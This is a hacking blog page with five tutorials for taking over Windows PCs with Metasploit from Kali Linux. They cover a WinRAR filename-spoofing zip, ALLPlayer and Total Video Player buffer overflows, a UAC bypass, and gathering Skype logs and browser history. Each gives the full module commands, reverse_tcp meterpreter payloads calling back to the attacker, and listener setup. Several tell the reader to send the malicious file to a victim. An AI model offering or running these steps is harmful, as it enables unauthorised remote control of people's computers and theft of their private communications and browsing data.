Hack Remote Windows PC using WinRAR Filename Spoofing

at 10:52 AM Friday, April 11, 2014 0 comments
This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in March 2014

Exploit Targets
WinRAR 4.20

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/winrar_name_spoofing
msf exploit (winrar_name_spoofing)>set payload windows/meterpreter/reverse_tcp
msf exploit (winrar_name_spoofing)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (winrar_name_spoofing)>exploit


After we successfully generate the malicious zip File, it will stored on your local computer
/root/.msf4/local/msf.zip


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send your msf.zip files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


Labels: ,

How to Gather Skype Logs, Firefox History and Chrome history of Remote Victim PC

at 1:38 PM Monday, April 7, 2014 1 comments
Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open Kali terminal type msfconsole


Now type use exploit/windows/gather/forensics/browser_history
msf exploit (browser_history)>set payload windows/meterpreter/reverse_tcp
msf exploit (browser_history)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (browser_history)>set session 1
msf exploit (browser_history)>exploit



All History Files saved in /root/.msf4/local/ Directory

Labels: ,

Bypass UAC Protection of Remote Windows PC in Memory Injection

at 1:37 AM Friday, March 14, 2014 0 comments
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also)

Exploit Targets
Windows 32 bit
Windows 64 bit

Requirement
Attacker: kali Linux
Victim PC: Windows 7

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)


Open Kali terminal type msfconsole


Now type use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1
msf exploit (bypassuac_injection)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (bypassuac_injection)>exploit  

Labels: ,

Hack Remote Windows PC using ALLPlayer M3U Buffer Overflow

at 12:26 AM Wednesday, March 5, 2014 0 comments
This Metasploit module exploits a stack-based buffer overflow vulnerability in ALLPlayer 2.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows 7 SP1.

Exploit Targets
ALLPlayer 2.8.1

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/allplayer_m3u_bof
msf exploit (allplayer_m3u_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (allplayer_m3u_bof)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (allplayer_m3u_bof)>exploit


After we successfully generate the malicious m3u File, it will stored on your local computer
/root/.msf4/local/msf.m3u


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


Labels: ,

Hack Remote Windows PC using Total Video Player 1.3.1 Buffer Overflow

at 4:03 AM Friday, February 28, 2014 0 comments
This Metasploit module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\". This Metasploit module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, and Windows 8.

Exploit Targets
Total Video Player 1.3.1
Windows XP
Windows 7
Windows 8

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/total_video_player_ini_bof
msf exploit (total_video_player_ini_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (total_video_player_ini_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (total_video_player_ini_bof)>exploit


After we successfully generate the malicious settings.ini File, it will stored on your local computer
/root/.msf4/local/settings.ini


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send your settings.ini files to victim, as soon as they download and replace with settings.ini file in C:\Program Files\Total Video Player\".  Now start video player now you can access meterpreter shell on victim computer


Labels: ,
Subscribe to: Posts (Atom)